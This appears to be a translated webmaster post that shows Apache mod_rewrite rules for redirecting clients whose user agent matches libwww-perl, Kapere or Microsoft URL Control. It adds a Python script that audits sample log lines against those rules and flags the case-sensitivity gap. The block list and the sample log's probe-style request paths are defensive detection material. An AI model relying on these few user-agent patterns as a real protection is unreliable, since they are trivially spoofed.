List of known scripts and recent attacks:
We notice that many of these injections target Joomla; this is discussed in the post "Joomla site hacks: which components are targeted?".
A simple way to ban a large number of attackers is to redirect them, from the global configuration of your web server, based on their connection parameters, such as the HTTP user agent: HTTP_USER_AGENT.
Here is a simple Apache example that blocks everyone identifying themselves as a browser named libwww-perl/xxx (e.g. libwww-perl/5.79):
RewriteEngine on
# Unanchored, case-sensitive regex tested against the User-Agent request header
RewriteCond %{HTTP_USER_AGENT} libwww-perl
# Matches any URL on the vhost: send an external redirect and stop processing rules
RewriteRule .*$ http://immobilier.placeoweb.com [R,L]
If you want to block several of them:
RewriteEngine on
# [OR] chains the conditions: a match on any one of them is enough to fire the rule
RewriteCond %{HTTP_USER_AGENT} Kapere [OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
# Spaces inside the pattern must be escaped in the Apache configuration
RewriteCond %{HTTP_USER_AGENT} Microsoft\ URL\ Control
RewriteRule .*$ http://perdu.com [R,L]
You can place these Apache directives, as you prefer, in:
You will find how to block more robots and site rippers at http://aide.sivit.fr/index.php?2005/07/25/84-bloquer-les-robots
For an explanation of the Apache directives involved, see the Apache documentation for Module mod_rewrite in English, or otherwise an older documentation in French.
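As an added example (not code from the original post), the following Python script replays the RewriteCond patterns from the rulesets above against a constructed sample of Apache combined-log lines, to check which requests the rules would actually redirect before deploying them; the IPs and user agents are made up. It also shows the caveat that a RewriteCond pattern is matched case-sensitively unless the [NC] flag is added, so a client sending "LibWWW-Perl" slips past the rule as written.

```python
import re
from collections import Counter

# Constructed sample of Apache combined-log lines (not taken from the original page).
SAMPLE_LOG = """\
203.0.113.10 - - [30/Jan/2012:02:46:58 +0100] "GET /ttt.txt HTTP/1.1" 404 322 "-" "libwww-perl/5.834"
198.51.100.7 - - [31/Jan/2012:00:30:01 +0100] "GET /index.php HTTP/1.1" 200 9346 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"
203.0.113.10 - - [31/Jan/2012:02:47:12 +0100] "GET /hack/php/liste.php HTTP/1.1" 200 5420 "-" "LibWWW-Perl/5.79"
192.0.2.44 - - [01/Feb/2012:08:30:01 +0100] "GET /dotclear/ HTTP/1.0" 200 1200 "-" "Microsoft URL Control - 6.00.8862"
192.0.2.45 - - [01/Feb/2012:08:31:01 +0100] "GET /robots.txt HTTP/1.1" 200 40 "-" "Kapere"
"""

# Same patterns as the RewriteCond lines of the post. Apache applies them as
# unanchored, case-sensitive regexes unless the [NC] flag is given.
BLOCKED_UA_PATTERNS = [r"Kapere", r"libwww-perl", r"Microsoft URL Control"]

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not combined-log format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def ua_blocked(ua, patterns=BLOCKED_UA_PATTERNS, nocase=False):
    """True if any pattern matches the user agent the way RewriteCond would (nocase mimics [NC])."""
    flags = re.IGNORECASE if nocase else 0
    return any(re.search(p, ua, flags) for p in patterns)

def audit(log_text, nocase=False):
    """Count redirected requests per client IP and list user agents that only a [NC] rule would catch."""
    blocked = Counter()
    missed = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines the parser does not understand rather than guessing
        if ua_blocked(rec["ua"], nocase=nocase):
            blocked[rec["ip"]] += 1
        elif ua_blocked(rec["ua"], nocase=True):
            missed.append(rec["ua"])  # differs only in case: passes the rules as written
    return blocked, missed

if __name__ == "__main__":
    hits, missed = audit(SAMPLE_LOG)
    print("redirected per IP:", dict(hits), "| missed by case-sensitive rules:", missed)
```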